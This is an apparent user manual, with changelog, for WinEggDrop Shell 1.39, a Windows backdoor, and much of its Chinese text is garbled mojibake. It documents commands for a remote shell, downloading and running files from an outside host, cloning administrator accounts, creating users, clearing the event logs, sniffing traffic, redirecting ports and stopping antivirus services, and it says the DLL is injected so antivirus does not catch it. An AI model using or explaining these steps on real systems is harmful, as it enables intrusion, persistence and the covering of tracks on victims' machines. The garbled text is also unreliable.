##############################################################################
#                              20CN簲ȫС                              #
#                     WinEggDrop Shell 1.39 By WinEggDrop                    #
#                            http://www.20cn.net/                            #
##############################################################################

WinEggDrop Shell 1.39˵

 
V1.31޸ĵĹ
1.¡ȫ¡Ϊȫ¡
2.ǿаһѴ򿪵Ķ˿ڹ

V1.32
1.޸SendܵһЩ
2.޸StartService,StopService,DeleteServiceܶпոķ
3.˲쿴ն˷˿ڹ
4.ն˷˿ڹ

V1.33
1.Ӳ鿴ֹ򼤻TCP/IP˹
2.˶û߳TCPת(Port Redirect)
3.޸˱ɨCPUʹʴﵽ100%bug

V1.34
1.һȫ޸˱ɨCPUʹʵ(һ汻ɨʱмϵͳCPUʹʻ
                                          100%)
2.˻ָùĹ(ɱľ,ԻָTXT,INI,INF,EXE
                               Լһ̫ΪעĽֵ)
3.оٱϵͳʻ(оٳϵͳʻĸ)
4.˲鿴ǰĿ¼͸µǰĿ¼(Щϵͳֹcmd.exe޷õһ
                                       Shell,ܿûShellлĿ¼)
5.鿴óʱĹ(Ĭ120ģ120ûǾͻԶϿ,ڿ
                           ӺԼóʱ).
6.鿴غԶSID(ֻΪ߼ûãSIDϤĻ,⹦
                            ûʲôô,оԶϵͳûǿԵ).


V1.35
1.FTP/POP3Ĺ(ֻwin 2kxpϵͳЧ)
2.ʹmd5checksumΪ֤Ļھ˵õ㹻Ļ
  ƽ
3.ıһЩϢֵԼ޸EditServer.exeеһBug.

V1.36
1.޸Hotmail䷢֪ͨĴ룬᳢Hotmailͬsmtpȥ
2.˲鿴Ϣܣгʱ䣬ϵͳ汾ڴСӲϢ.
3.Ѻõ߰ڴܶ˵Ѽס﷨һѺõİ
  ˿¡ʻ﷨ǵÿ¡ʻclone,ôֻҪclone,س
  ͿԿ¡ʻ﷨Լһӡ
4.߰ĵһĸ˳ˣŻǰ׿Щˡ
5.Ӳ鿴ĳ״̬
6.޸ĳ״̬
7.CдEditServer.exe,ʹEditServer.exeѹֻ6kС

V1.37
û汾Ϊ37̫û汾.

V1.38
1.ϹܶV1.36ģֻ޸˼Сbugs,Լд˺СֵĴ
2.һıǽԭԿִļеĳдΪDLL,ͨInectT.exe嵽
  ȥУʹŸѱԼɱ
3.ųῪ̣߳һǴûӣһǶʱŵķǷɾ
  ŷĳ(InjectT.exeĬ)ǷɾɾĻȫָֻ

V1.39
1.˲鿴ɾעrunrunservicesĹ
2.ΪʹõݹV1.38(shownameshowsid),V1.36ûģ
  ڵݹҪʹñȽ϶ڴռ䣬V1.38ǲ뵽еģԳ⡣


V1.39
1.Pslist                                   ˵:ʾ
2.ListIp                                   ˵:ʾϵͳIP
3.ShowSID                                  ˵:ʾϵͳʻSID(עsamµֵõ)
4.Fport                                    ˵:̴򿪵Ķ˿б
5.Online                                   ˵:гӽȥŵûIP
6.WhoIsShell                               ˵:гĸIPõһshell
7.ShowName                                 ˵:ʾϵͳʻ(ͨע,ʾʻ)
8.Reboot                                   ˵:̨ϵͳ
9.ShutDown                                 ˵:ر̨ϵͳ
10.Logoff                                  ˵:ע½˵ʻ
11.PowerOff                                ˵:ϵͳԴ
12.Shell                                   ˵:õһShell
13.Stopbackdoor                            ˵:ֹͣwineggdropshell
14.pskill                                  ˵:ɱ
15.Never                                   ˵:ĳʻʹĵ½ʱ䱻Ϊ޵½Լ
                                                    ½Ϊ0
16.Dir                                     ˵:ʾǰĿ¼ļ
17.Del                                     ˵:ɾļ
18.Execute                                 ˵:ִг
19.Http://IP/ļ                          ˵:ļ
20.Installterm                             ˵:װն˷
21.Clone                                   ˵:¡һϵͳʻ
22.Send                                    ˵:wineggdropshellûϢ
23.Exit                                    ˵:Ͽ
24.OffShell                                ˵:õShellûȥ
25.Help                                    ˵:ʾ˵
26.Disconnect                              ˵:ûȥ
27.StopService                             :ֹͣϵͳĳ
28.StartService                            :ϵͳĳ
29.DeleteService                           :ɾϵͳĳ
30.CleanEvent                              ˵:ϵͳ־
31.TerminalPort                            ˵:鿴ն˷˿
32.Redirect                                ˵:TCPת
33.ViewThreads                             ˵:鿴TCPת򿪵߳
34.KillThreads                             ˵:ɱĳTCPת߳
35.EnableFilter                            ˵:TCP/IP
36.DisableFilter                           ˵:ֹTCP/IP
37.FilterInfo                              ˵:鿴TCP/IPǴڼǽֹ״̬
38.AR                                      ˵:ָϵͳõĹ
39.GetUser                                 ˵:оϵͳʻ
40.ViewPath                                ˵:鿴ǰĿ¼
41.SetPath                                 ˵:õǰĿ¼
42.SID                                     ˵:鿴ػԶϵͳʻSID
43.ViewTimeOut                             ˵:鿴ʱ
44.SetTimeOut                              ˵:óʱ
45.StartSniffer                            ˵:빦
46.StopSniffer                             ˵:ֹͣ
47.ViewSniffer                             ˵:鿴빦Ƿڽ
48.Sysinfo                                 ˵:鿴ϵͳϢ
49.ViewService                             ˵:鿴ĳ״̬
50.ConfigService                           ˵:޸ĳ״̬
51.ViewKey                                 ˵:鿴runrunservicesе
52.DelKey                                  ˵:ɾrunrunservicesеһ
ϸ÷뿴˵



ʹóǰȿ˵:
1.úInjectT.exe,ȻInjectT.exeǸTBack.Dllصϵͳwinnt\system32£
Ȼִ
        InjectT.exe -run         (װΪִ)
 

ǵTelnetWinEggDropShellʹõ
V1.39
1.pslist                          ܣʾϵͳ
÷:pslist

2.ListIP                          :ʾϵͳIP(ⲿڲIP)
÷:ListIP

3.ShowSID                         :ʾϵͳʻSID
÷:ShowSID

4.ShowName                        :ʾϵͳʻ
÷:ShowName

5.Fport                           :̵˿б
÷:Fport

6.Online                          :ʾwineggdropshellûIPԼʹõThread
÷:Online

7.WhoIsShell                      :ʾĸIPʹShell
÷:WhoIsShell

8.Reboot                          :ϵͳ
÷:Reboot

9.ShutDown                        :رϵͳ
÷:ShutDown

10.Logoff                          :ע½˵ϵͳû
÷:Logoff

11.PowerOff                       :رյԴ
÷:PowerOff

12.Shell                          :õһDos Shell (V1.1֤ǵõһDos Shell)
÷:Shell

13.Stopbackdoor                   :ֹͣWinEggDropShell񣬵½ûȫϿ
÷:Stopbackdoor

14.Help                           :ʾ
÷:Help                         

15.Exit                           :Ͽ
÷:Exit

16.Pskill PID             :ɱ
÷:pskill 1234
÷:pskill notepad

17.Never û                   :ĳû趨ʹĵ½Ϊ0Լûе½ϵͳ
÷:Never Guest
÷:Never Administrator

18.Dir ļ                     :ʾǰĿ¼ļ֧ͨ
÷:Dir *.exe

19.Del ļ                     :ɾǰĿ¼һļ,֧ͨ
÷: Del a.txt

20.Execute                    :ںִ̨г
÷:Execute abc.exe
÷:Execute net.exe user test test
ע:ҪִеĳҪչִܲгɹ.

21.http://ip/ļ ļ    :س
÷:http://11.11.11.11/a.exe a.exe
÷:http://www.mysite.com/a.exe a.exe

22.Installterm ˿               :ûаװն˷win 2kϵͳаװն˷ϵͳЧ.
÷:Installterm 3345             (ն˻3345Ǹ˿,ʹôǰȿҪն˵Ķ˿Ƿ
                                   )

23.Clone ʻ Ҫ¡ʻ    :¡һʻ
÷:Clone Admin Guest test
÷ЧGuest¡AdminǸûУGuest뱻Ϊtest

24.Send All Ϣ                  :½wineggdropshellûϢ
÷:Send all 

25.OffShell                       :õShellûȥ
÷:OffShell

26.Disconnect                     :û(Ƿǵõshell)
÷:Disconnect ThreadNumber ->ĳûȥ
÷:Disconnect All          ->ûȥԼ
ע:εõThreadNumber?ʹOnline(бĵ6),ͿԵõ
     е½˵ûThreadNumber.

27.StopService                    :ֹͣϵͳĳ
÷:StopService 
:StopService w3svc(IISֹͣ)

28.StartService                   :ϵͳĳ
÷:StartService 
:StartService w3svc(IIS)

29.DeleteService                  :ɾϵͳĳ
÷:DeleteService 
ע:һɾһǰҪҪǸֹͣģΪЩnet stopûӦģ
     ֱֻɾǿнһеķɾеģԽʹstopservice
     ֹֹͣͣǾ.

30.CleanEvent                     :ɾϵͳ־
÷:CleanEvent
ὫϵͳApplication,SecurityԼSystem־ȫɾ

31.TerminalPort                  :鿴ն˷˿
÷:TerminalPort          

32.TerminalPort µĶ˿         :ն˷˿
÷:TerminalPort µĶ˿

33.Redirect                                ˵:TCPת
÷:Redirect ˿ ԶϵͳIP Զ̶˿
:Redirect 2222 12.12.12.12 3333 (κӵ2222˿ڵTCPݶת
                                     12.12.12.12IPĶ˿3333ȥ)
:Redirect 2222 www.abc.com 3333 (κӵ2222˿ڵTCPݶת
                                     www.abc.comĶ˿3333ȥ)

34.ViewThreads                             ˵:鿴TCPת򿪵߳
÷:ViewThreads                   

35.KillThreads                             ˵:ɱĳTCPת߳
÷:KillThreads ̺߳
ע:̺߳ͨViewThreads

36.EnableFilter                            ˵:TCP/IP
÷:EnableFilter

37.DisableFilter                           ˵:ֹTCP/IP
÷:DisableFilter

38.FilterInfo                              ˵:鿴TCP/IPǴڼǽֹ״̬
÷:FilterInfo

39.AR                                      ˵:ָϵͳõĹ
÷:AR

40.GetUser                                 ˵:оϵͳʻ
÷:GetUser

41.ViewPath                                ˵:鿴ǰĿ¼
÷:ViewPath

42.SetPath                                 ˵:õǰĿ¼
÷:SetPath Ŀ¼

43.SID                                     ˵:鿴ػԶϵͳʻSID
÷:SID Local|IP
:SID Local                             (鿴ʻSID)
:SID IP                                (鿴ԶIPʻSID,ֻӣɹ)

44.ViewTimeOut                             ˵:鿴ʱ
÷:ViewTimeOut

45.SetTimeOut                              ˵:óʱ
÷:SetTimeOut 

46.StartSniffer                            ˵:빦
÷:StartSnifer NIC
:StartSniffer 0
ע:NICĺţܶϵͳмģҪѡѡ
     ʹListIPܿԿӦIPԼ.ᱣ浽Sniffer.dll
     ȥ

47.StopSniffer                             ˵:ֹͣ
÷:StopSniffer

48.ViewSniffer                             ˵:鿴빦Ƿڽ
÷:ViewSniffer

49.Sysinfo                                 ˵:鿴ϵͳϢ
÷:Sysinfo

50.ViewService                             ˵:鿴ĳ״̬
÷:ViewService ServiceName
:ViewService Norton Antivirus Server

51.ConfigService                           ˵:޸ĳ״̬
÷:ConfigService StartType ServiceName
:ConfigService Auto W3svc           -->IIS״̬ΪԶ
:ConfigService Demand w3svc         -->IIS״̬Ϊֶ
:ConfigService Disable w3svc        -->IIS״̬Ϊֹ
ע:еStartTypeֻAuto,Demand,Disableеһ֣AutoԶ
     DemandֶԼDisableֹ.

52.ViewKey                                 ˵:鿴runrunservicesе
÷:ViewKey

53.DelKey                                  ˵:ɾrunrunservicesеһ
÷:DelKey KeyName
1: DelKey radmm
2: DelKey Tk BellExe

